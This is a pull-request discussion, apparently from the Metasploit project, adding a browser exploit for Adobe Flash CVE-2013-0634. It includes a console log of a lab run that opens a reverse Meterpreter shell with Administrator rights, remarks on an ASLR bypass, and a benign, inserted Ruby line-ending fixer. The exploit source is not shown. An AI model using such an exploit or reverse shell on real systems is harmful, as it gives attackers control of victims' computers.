
Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption #2895

Merged: 2 commits, Apr 18, 2014

Conversation

@dukebarman (Contributor)

Add exploit for CVE-2013-0634. PoC video: http://www.youtube.com/watch?v=kuaofEQ5liA

@wchen-r7 (Contributor)

Thanks @dukebarman. We need the source of your swf file. Please place it under external/source/exploits as a new directory, thanks again.


@wchen-r7 (Contributor)

Noted. Thanks!

@jvazquez-r7 (Contributor)

I'm going to give this pull request a chance today.

@jvazquez-r7 jvazquez-r7 self-assigned this Apr 16, 2014
@jvazquez-r7 (Contributor)

The Ruby code isn't msftidy compliant. That should be fixed:

$ tools/msftidy.rb modules/exploits/windows/browser/adobe_flash_regex_value.rb
modules/exploits/windows/browser/adobe_flash_regex_value.rb - [WARNING] Module should not be marked executable
modules/exploits/windows/browser/adobe_flash_regex_value.rb:1 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:2 - [WARNING] Carriage return EOL
modules/exploits/windows/browser/adobe_flash_regex_value.rb:3 - [WARNING] Carriage return EOL
[... the same "Carriage return EOL" warning is reported for every line of the file, 4 through 125 ...]
modules/exploits/windows/browser/adobe_flash_regex_value.rb:126 - [WARNING] Carriage return EOL

@todb (Contributor) commented Apr 16, 2014

These EOL errors tend to come from writing text files in Windows. You'll want to convert this to a proper POSIX end of line format, otherwise the formatting looks all silly.
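The two msftidy warnings quoted above (a module marked executable, and "Carriage return EOL" on every line) are both mechanical to detect and to fix. The Ruby below is an added example, not part of this pull request and not msftidy's own code: it reports the same two conditions on a file's content, rewrites CRLF (and stray CR) endings to LF, and clears the executable bit. The sample content and the module path it prints are constructed for illustration.

```ruby
# Added example: detect and repair the two msftidy conditions discussed in
# the thread. Not the msftidy implementation; the helper names, the sample
# text and the example path below are assumptions made for illustration.

# 1-based line numbers whose end-of-line sequence contains a carriage return
# ("\r\n", or a bare "\r" on the final line).
def crlf_lines(text)
  result = []
  text.each_line.with_index(1) do |line, idx|
    result << idx if line =~ /\r\n?\z/
  end
  result
end

# Rewrite CRLF (and lone CR) line endings to POSIX LF.
def to_posix_eol(text)
  text.gsub(/\r\n?/, "\n")
end

# msftidy-style warning lines for a module. `path` is used only for the
# report; `text` is the file content; `executable` is the mode-bit state.
def eol_warnings(path, text, executable: false)
  warnings = []
  warnings << "#{path} - [WARNING] Module should not be marked executable" if executable
  crlf_lines(text).each do |n|
    warnings << "#{path}:#{n} - [WARNING] Carriage return EOL"
  end
  warnings
end

# Check a file on disk; with fix: true, rewrite it with LF endings and
# drop the executable bit. Returns the warnings found before fixing.
def check_and_fix(path, fix: false)
  text = File.binread(path)
  executable = File.executable?(path)
  warnings = eol_warnings(path, text, executable: executable)
  if fix
    File.binwrite(path, to_posix_eol(text))
    File.chmod(0644, path) if executable
  end
  warnings
end

if __FILE__ == $0
  # Constructed sample: a three-line header written with Windows line endings.
  sample = "##\r\n# This module requires Metasploit\r\n##\r\n"
  puts eol_warnings("modules/exploits/windows/browser/example.rb", sample, executable: true)
  puts to_posix_eol(sample).inspect
end
```

`crlf_lines` splits on "\n" only, so a "\r" that precedes the newline is still visible on each line; an editor-level conversion (dos2unix, or `git config core.autocrlf`) achieves the same result as `to_posix_eol`, but checking the content before committing is what keeps the warning from coming back.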

@jvazquez-r7 (Contributor)

Just for the author's interest: I'm currently working on the ActionScript review atm, will update with more feedback once the review is finished!

@jvazquez-r7 (Contributor)

I had to change the filename to pia.as in order to easily compile with mxmlc.

After that, pia.as compiled easily, and it's working on IE6 / Flash 11.5.502.110:

msf exploit(adobe_flash_regex_value) > rexploit
[*] Stopping existing job...
[*] Server stopped.
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Using URL: http://192.168.172.1:8080/trbMH5OZWjQ
[*] Server started.
msf exploit(adobe_flash_regex_value) > [*] 192.168.172.244  adobe_flash_regex_value - Gathering target information.
[*] 192.168.172.244  adobe_flash_regex_value - request: /trbMH5OZWjQ/CypsHQ/
[*] 192.168.172.244  adobe_flash_regex_value - Sending HTML
[*] 192.168.172.244  adobe_flash_regex_value - request: /trbMH5OZWjQ/CypsHQ/Main.swf
[*] 192.168.172.244  adobe_flash_regex_value - Sending SWF
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1172) at 2014-04-16 09:57:49 -0500
[*] Session ID 1 (192.168.172.1:4444 -> 192.168.172.244:1172) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (1076)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3272
[+] Successfully migrated to process 

msf exploit(adobe_flash_regex_value) > sessions

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  JUAN-C0DE875735\Administrator @ JUAN-C0DE875735  192.168.172.1:4444 -> 192.168.172.244:1172 (192.168.172.244)

msf exploit(adobe_flash_regex_value) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 1 closed.  Reason: User exit

I continue working on it, more feedback will be coming.

@dukebarman (Contributor, Author)

Thanks! I tested on IE8 + Windows XP

@jvazquez-r7 (Contributor)

@dukebarman cool, I've deobfuscated and cleaned the AS. I'm cleaning everything up and landing in a while; thanks a lot for porting it as an msf module :) kinda nice work :) Landing is coming, just let me finish things :)

@jvazquez-r7 jvazquez-r7 merged commit 88c2838 into rapid7:master Apr 18, 2014
@jvazquez-r7 (Contributor)

Landed, thanks @dukebarman, see final landing here: b0e4648

Helped deobfuscating the AS, adding support for Win7 SP1 (without MS13-063!!! since it kills the technique used for the ASLR bypass), and fixing the Ruby code a little bit. Hope you like :-)

BTW, I only tested with 11.5 versions, but probably it can work on older versions of Flash as is, or with minor tweaking; I didn't have time to test. Also, bypassing ASLR on Win7 SP1 with MS13-063 should be feasible :) I didn't have time to finish that either! Maybe in the near future :)

Thanks a lot @dukebarman for an awesome contrib!
